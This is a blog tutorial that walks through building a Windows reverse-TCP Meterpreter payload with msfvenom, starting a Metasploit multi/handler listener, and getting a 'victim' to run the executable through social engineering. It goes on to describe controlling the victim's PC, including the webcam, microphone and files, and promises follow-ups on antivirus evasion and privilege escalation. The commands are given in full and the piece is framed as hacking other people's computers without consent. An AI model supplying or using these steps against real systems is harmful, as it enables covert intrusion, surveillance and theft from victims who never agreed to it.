How to Create a Virus for HACK a Computer


Hello Guys After a Long Time i am Posting on my Blog but from now i am Try to post regularly.
So Guys today's topic is how to make a simple METASPLOIT payload using MSFVENOM in this article you will learn that how to make a simple Payload for HACKING WINDOWS i am telling you for both 32bit(x86) and 64bit(x64).So guys keep with me because these are the very basic steps for making a viruses in Future i will also post on how to make fully undectable Paylods that can bypass any antiviruses and firewall.

NOTE:All commands is between 4 asterisks like this **commands**

Some Basic things before you start -:
1 --> Computer (obviously)
2 --> Kali Linux Operating System
3 --> Virtual Environment ex- VMware,VMplayer or you can also make your USB PERSISTENCE (if you want to know how to do that please comment below i can post article on that)
4 --> Some Social Engineering tricks for hacking a Victim (-;
5 --> Brain :D

-------Let's Go for it---------


For making Paylods we are gonna use MSfvenom Tool which is pre-installed in kali linux.If you are using another distribution of linux than you can install it by typing this command in Terminal **apt-get install msfvenom**.Remember Guys we making a very simple payload that can be detects by many anti-viruses in coming post's we are gonna talk about FUD(fully undectable) payloads. So be some Patience.So here we go.Firstly Fire up your kali in VMware or whatever you are using in.You can see my virtual machine settings in below image.

Make sure your Connection Type will be in BRIDGED not in NAT- 


After all of this....Open your terminal 



Now type in your terminal **msfvenom -h** you will see lot of options of it don't worry we are not gonna use all of it.


clear your teminal by typing **clear** command or by pressing **ctrl+l**
After this type a command **msfvenom -p windows/meterpreter/reverse_tcp LHOST=(here you have to type your kali IP) LPORT=(type any port) -f exe -o (here give the path where you want to save your payload)** after that hit **ENTER** you can see the picture below for more understanding



Now i am gonna understand you each and every parameter of this payload that you can easily understand it. Tip:Hacking is all about Learning not copy and pasting
(msfvenom) -- is pre-installed tool for making viruses
(-p) -- is use for payload 
(windows/meterpreter/reverse_tcp) -- here is the main thing you have to learn is WINDOWS if you are creating a payload for android then you can replace it by android and the second thing you have to notice is TCP you can also use http or https in future we are gonna talk about it briefly but for now its ok.
(LHOST) -- this is your localhost address you can check it by typing **ifconfig** in your terminal
(LPORT) -- this is the port on which we are listening we are attacking on LAN so you put any port but when we creating it on WAN than you will have to port-forward we can talk it about Later.
(-f) -- this is use for Format that what format you want to make a payload we are using .exe for windows
(-o) -- this is use for output that where you want to save your payload give it that path
Thats all these things are important if you want to Learn something (-:


WhooHoo!! Now we know that how to make a virus that can hack anybody's Computer.....but wait not all things is done here Now you have to make a connection between you and your victims PC.You can do this STEPS before sending payload to your victim because it takes a little bit of time. So here we go-

First open a New Terminal in terminal type **service postgresql start** this is for not getting any error after this type **msfconsole** it takes a little bit of time to start it looks like this --: 



Don't worry if your animation is different because it changes every time when you opens it if you don't want animation then type in terminal **msfconsole -q**
Now our msfconsole is ready now we are gonna set up things to control the victims PC.
Type in msf-:
msf > use exploit/multi/handler



msf > set PAYLOAD windows/meterpreter/reverse_tcp



msf > set LHOST (your local ip) if you want to check your local IP then open up a new terminal and type **ifconfig** and check out after inet before that please check your interface on which interface you are working on Wlan0 or eth0 in my case it is eth0.



set your local IP



msf > LPORT (type any port) i am using 4444 port



you can check that all your settings is properly set or not by typing **show options** in terminal



Now you have to only type one command in your msf but before that send that payload to your victim.




Now type in your msf 
msf > exploit
when your victim clicks on your payload then you will got a reverse connection.



If you see [Meterpreter Session 1 opened ] than your victim is successfully hacked first you have to interact with open session by tying **session -i** or you can wait some second you have to look like this meterpreter >



Hurray!! Now you can control your victim PC
type this in meterpreter:-
meterpreter > help (or you can also put **?**) 



You can see lot of options there you can do all that things like Taking pictures in my case i can't take websnap's because i don't have camera software you don't get this type of error you can also record a mic you can check system information or many things. 






You can make folders or delete folders you can do whatever you want but one main thing at this time you don't have admin privelages so practically you can't do anything you want you cannot make or delete folders or files in C:Windows/C:System32 but still you have lot of things to do.In future posts we learn that how to privelage escalte to bypass admin.Later we Learn than how you can also get AUTHORITY of your payload.


So guys here is the first virus you made and hack your victim guys if you wanna make 64bit(x64) payload then its very simple when we creating a payload you have to add one thing when we type this for 32 bit windows/meterpreter/reverse_tcp you have to add x64 like this windows/x64/meterpreter/reverse_tcp and you have to also change it when we listen in msf type this in msf > windows/x64/meterpreter/reverse_tcp that's it this will create a x64 bit payload.So i hope guys you like this article if you have any questions related to this you can comment me.So see you in the next one.

Thank you for visiting this Blog.

Article By-:
Shivank Yadav

Comments

Popular Posts